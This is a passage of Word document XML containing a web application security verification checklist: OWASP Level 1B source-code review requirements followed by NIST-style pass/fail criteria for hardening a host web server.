    <w:p w14:paraId="0B573A84" w14:textId="77777777" w:rsidR="009107BE" w:rsidRPr="009107BE" w:rsidRDefault="009107BE" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C6CA256" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L1B.1</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>The verifier shall perform source code scanning on the web application according to the Level 1B requirements specified in the [OWASP] “Detailed Verification Requirements” section [reproduced below for convenience].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9C828D" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="1440" w:hanging="1440"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="354935BD" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>The verifier shall identify all application components (either individual or groups of source files, libraries, and/or executables) present in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F5752" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE5BF73" w14:textId="77777777" w:rsidR="00705B56" w:rsidRPr="009107BE" w:rsidRDefault="00705B56" w:rsidP="00705B56">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BEE96BD" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that all pages and resources require authentication except those specifically intended to be public.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B19A327" w14:textId="77777777" w:rsidR="00705B56" w:rsidRPr="009107BE" w:rsidRDefault="00705B56" w:rsidP="00705B56">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21950ED9" w14:textId="77777777" w:rsidR="00772AAA" w:rsidRPr="001D6344" w:rsidRDefault="00772AAA" w:rsidP="0035074F">
      <w:pPr>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:color w:val="008000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E676216" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F2ADC3B" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V2.11</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that all password fields do not echo the user’s password when it is entered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F8F2F" w14:textId="77777777" w:rsidR="00C76C32" w:rsidRDefault="00C76C32" w:rsidP="00C76C32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5934F06A" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V3.7</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that the session id is never disclosed other than in cookie headers, particularly in URLs or logs. This includes verifying that the application does not support URL rewriting of session cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF7F38A" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00C44036">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6946D796" w14:textId="77777777" w:rsidR="00C76C32" w:rsidRPr="009107BE" w:rsidRDefault="00C76C32" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC98941" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V4.4</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that users can only access protected functions for which they possess specific authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A374CF" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C4D5C7" w14:textId="77777777" w:rsidR="00C76C32" w:rsidRPr="009107BE" w:rsidRDefault="00C76C32" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E4A366B" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V5.9</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that the environment is not susceptible to buffer overflows, or that security controls prevent buffer overflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40167BEA" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="399CA011" w14:textId="77777777" w:rsidR="001D6344" w:rsidRPr="009107BE" w:rsidRDefault="001D6344" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48B580C5" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V8.8</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that that the application does not output error messages containing sensitive data that could assist an attacker, including session id and personal information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7619E22D" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A06C5AB" w14:textId="77777777" w:rsidR="0035074F" w:rsidRPr="009107BE" w:rsidRDefault="0035074F" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DA0B8F" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRPr="009107BE" w:rsidRDefault="00775922" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V9.3</w:t>
      </w:r>
      <w:r w:rsidR="00CE3747">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE3747">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F63F09" w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that all forms containing sensitive information have disabled</w:t>
      </w:r>
      <w:r w:rsidR="001D6344">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> client side caching, including </w:t>
      </w:r>
      <w:r w:rsidR="00F63F09" w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>autocomplete features.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FA5001" w14:textId="77777777" w:rsidR="0035074F" w:rsidRPr="009107BE" w:rsidRDefault="0035074F" w:rsidP="00DF5816">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38DC1526" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00DF5816">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V11.1</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that every HTTP response contains a content type header specifying a safe character set (e.g., UTF-8).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E242406" w14:textId="77777777" w:rsidR="0035074F" w:rsidRPr="009107BE" w:rsidRDefault="0035074F" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B86F67B" w14:textId="77777777" w:rsidR="00F63F09" w:rsidRDefault="00F63F09" w:rsidP="00DF5816">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V11.2</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that redirects do not include unvalidated data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AADA14" w14:textId="77777777" w:rsidR="0035074F" w:rsidRPr="009107BE" w:rsidRDefault="0035074F" w:rsidP="00F63F09">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C7CDB73" w14:textId="77777777" w:rsidR="00E662BC" w:rsidRPr="003E77BA" w:rsidRDefault="00F63F09" w:rsidP="003E77BA">
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>V11.3</w:t>
      </w:r>
      <w:r w:rsidRPr="009107BE">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>Verify that the application accepts only a defined set of HTTP request methods, such as GET and POST.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFBAEBB" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="0094295D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc46402742"/>
      <w:r>
        <w:t>Web Server NIST Pass/Fail Verdicts</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="0E6B219D" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="0094295D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EF54A3E" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that the host server software levels have been identified – OS and web server software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632E0DEE" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="0094295D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D94264" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that all host server applications and operational services have been identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4FBDA" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="007D4857">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22CEA80C" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that all host server operating system users and groups have been identified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D11A3A2" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="0094295D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BF5E6F" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that administrative activities have been limited to authorized users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4096A769" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="0094295D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EA12DE0" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that unnecessary applications and services have been disabled at the operating system and web server software levels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3869D633" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="0094295D">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F4B24B0" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00544303" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544303">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify that </w:t>
      </w:r>
      <w:r w:rsidRPr="00544303">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>users and administrators are able to change passwords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> through an established procedure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB5CB1" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="0094295D" w:rsidRDefault="0094295D" w:rsidP="007D4857">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64AFA33A" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="00544303" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00544303">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that users are disabled after a specified period of inactivity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4115D95D" w14:textId="77777777" w:rsidR="00592170" w:rsidRDefault="00592170" w:rsidP="007D4857">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E4090D5" w14:textId="77777777" w:rsidR="00592170" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that host server activities are logged and periodically reviewed by system administrators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E014999" w14:textId="77777777" w:rsidR="00592170" w:rsidRDefault="00592170" w:rsidP="00592170">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62711CC4" w14:textId="77777777" w:rsidR="00592170" w:rsidRPr="007D4857" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00592170">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that all vendor-recommended critical security patches have been applied and that there is an established procedure and schedule to perform this activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28696F29" w14:textId="77777777" w:rsidR="00592170" w:rsidRDefault="00592170" w:rsidP="00592170">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FDA3735" w14:textId="77777777" w:rsidR="0094295D" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that the password policies are in alignment with best practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2184D8C1" w14:textId="77777777" w:rsidR="008F5834" w:rsidRDefault="008F5834" w:rsidP="007D4857">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007C1831" w14:textId="77777777" w:rsidR="0094295D" w:rsidRPr="005716AA" w:rsidRDefault="0094295D" w:rsidP="00F821F1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Verify that additional software control</w:t>
      </w:r>
      <w:r w:rsidR="008F5834">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">s are installed and up-to-date </w:t>
      </w:r>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">such as </w:t>
      </w:r>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>such as antivirus softwa</w:t>
      </w:r>
      <w:r w:rsidR="008F5834">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">re, antispyware software, </w:t>
      </w:r>
      <w:r w:rsidRPr="005716AA">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>rootkit detectors (Unix only), and host-based intrusion detection or firewalls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B8CC7E" w14:textId="77777777" w:rsidR="008F5834" w:rsidRDefault="008F5834" w:rsidP="008F5834">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
